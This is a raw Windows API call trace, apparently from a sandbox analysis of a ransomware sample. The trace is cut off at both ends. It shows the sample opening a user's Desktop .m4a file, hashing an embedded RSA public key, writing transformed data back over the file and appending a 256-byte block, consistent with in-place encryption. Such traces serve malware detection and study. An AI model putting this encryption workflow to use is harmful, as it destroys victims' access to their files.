PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-onKqnd5MCC.m4a") returned=".m4a" [0094.218] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-onKqnd5MCC.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-onkqnd5mcc.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.219] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=72441) returned 1 [0094.219] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.221] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x11ad3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.221] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.222] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.222] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.222] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.222] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x11af9, lpOverlapped=0x0) returned 1 [0094.223] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.223] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.223] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.223] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.223] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.224] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.224] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.224] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.224] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.224] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.224] GetLastError () returned 0x0 [0094.224] SetLastError (dwErrCode=0x0) [0094.224] GetLastError () returned 0x0 [0094.224] SetLastError (dwErrCode=0x0) [0094.224] GetLastError () returned 0x0 [0094.225] SetLastError (dwErrCode=0x0) [0094.225] GetLastError () returned 0x0 [0094.225] SetLastError (dwErrCode=0x0) [0094.225] GetLastError () returned 0x0 [0094.225] SetLastError (dwErrCode=0x0) [0094.225] GetLastError () returned 0x0 [0094.225] SetLastError (dwErrCode=0x0) [0094.225] GetLastError () returned 0x0 [0094.225] SetLastError (dwErrCode=0x0) [0094.225] GetLastError () returned 0x0 [0094.225] SetLastError (dwErrCode=0x0) [0094.225] GetLastError () returned 0x0 [0094.226] SetLastError (dwErrCode=0x0) [0094.226] GetLastError () returned 0x0 [0094.226] SetLastError (dwErrCode=0x0) [0094.226] GetLastError () returned 0x0 [0094.226] SetLastError (dwErrCode=0x0) [0094.226] GetLastError () returned 0x0 [0094.226] SetLastError (dwErrCode=0x0) [0094.226] GetLastError () returned 0x0 [0094.226] SetLastError (dwErrCode=0x0) [0094.226] GetLastError () returned 0x0 [0094.226] SetLastError (dwErrCode=0x0) [0094.226] GetLastError () returned 0x0 [0094.226] SetLastError (dwErrCode=0x0) [0094.226] GetLastError () returned 0x0 [0094.226] SetLastError (dwErrCode=0x0) [0094.227] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.227] GetLastError () returned 0x0 [0094.227] SetLastError (dwErrCode=0x0) [0094.227] GetLastError () returned 0x0 [0094.227] SetLastError (dwErrCode=0x0) [0094.227] GetLastError () returned 0x0 [0094.227] SetLastError (dwErrCode=0x0) [0094.227] GetLastError () returned 0x0 [0094.227] SetLastError (dwErrCode=0x0) [0094.227] GetLastError () returned 0x0 [0094.227] SetLastError (dwErrCode=0x0) [0094.227] GetLastError () returned 0x0 [0094.227] SetLastError (dwErrCode=0x0) [0094.227] GetLastError () returned 0x0 [0094.228] SetLastError (dwErrCode=0x0) [0094.228] GetLastError () returned 0x0 [0094.228] SetLastError (dwErrCode=0x0) [0094.228] GetLastError () returned 0x0 [0094.228] SetLastError (dwErrCode=0x0) [0094.228] GetLastError () returned 0x0 [0094.228] SetLastError (dwErrCode=0x0) [0094.228] GetLastError () returned 0x0 [0094.228] SetLastError (dwErrCode=0x0) [0094.228] GetLastError () returned 0x0 [0094.228] SetLastError (dwErrCode=0x0) [0094.229] GetLastError () returned 0x0 [0094.229] SetLastError (dwErrCode=0x0) [0094.229] GetLastError () returned 0x0 [0094.229] SetLastError (dwErrCode=0x0) [0094.229] GetLastError () returned 0x0 [0094.229] SetLastError (dwErrCode=0x0) [0094.229] GetLastError () returned 0x0 [0094.229] SetLastError (dwErrCode=0x0) [0094.229] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.229] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.229] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.229] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.229] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.229] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.230] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.230] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.230] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.230] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.230] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.230] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.230] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11b00) returned 0x99f52d8 [0094.231] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.231] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.231] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x3193e68 [0094.231] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.231] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x320fab0 [0094.231] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0094.231] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3100 [0094.231] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e08 [0094.231] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0094.231] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8df0 [0094.231] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8ee0 [0094.231] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.231] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8d48 [0094.231] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.231] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x31ce620 [0094.231] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x31ce620, Size=0x218) returned 0x3165e90 [0094.231] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.231] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8ee0 | out: hHeap=0x680000) returned 1 [0094.232] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8d48 | out: hHeap=0x680000) returned 1 [0094.232] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.232] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.232] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0094.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8d48 [0094.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d8ee0 [0094.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0094.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8d48 | out: hHeap=0x680000) returned 1 [0094.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8ee0 | out: hHeap=0x680000) returned 1 [0094.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0094.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0094.233] GetCurrentThreadId () returned 0x8c4 [0094.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e11f0 [0094.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.234] GetCurrentThreadId () returned 0x8c4 [0094.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x31bee50 [0094.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bee50 | out: hHeap=0x680000) returned 1 [0094.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.235] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8ee0 [0094.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0094.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8d48 [0094.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8dc0 [0094.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8f58 [0094.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e80 [0094.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8ee0 | out: hHeap=0x680000) returned 1 [0094.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8ee0 [0094.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x3165e90 [0094.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8ee0 | out: hHeap=0x680000) returned 1 [0094.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31bc228 [0094.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bc228 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f58 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8d48 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8dc0 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8df0 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x320fab0 | out: hHeap=0x680000) returned 1 [0094.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3193e68 | out: hHeap=0x680000) returned 1 [0094.240] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f52d8*, nNumberOfBytesToWrite=0x11af4, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f52d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x11af4, lpOverlapped=0x0) returned 1 [0094.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0094.245] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x11af9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.245] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.267] HeapFree (in: hHeap=0x680000, 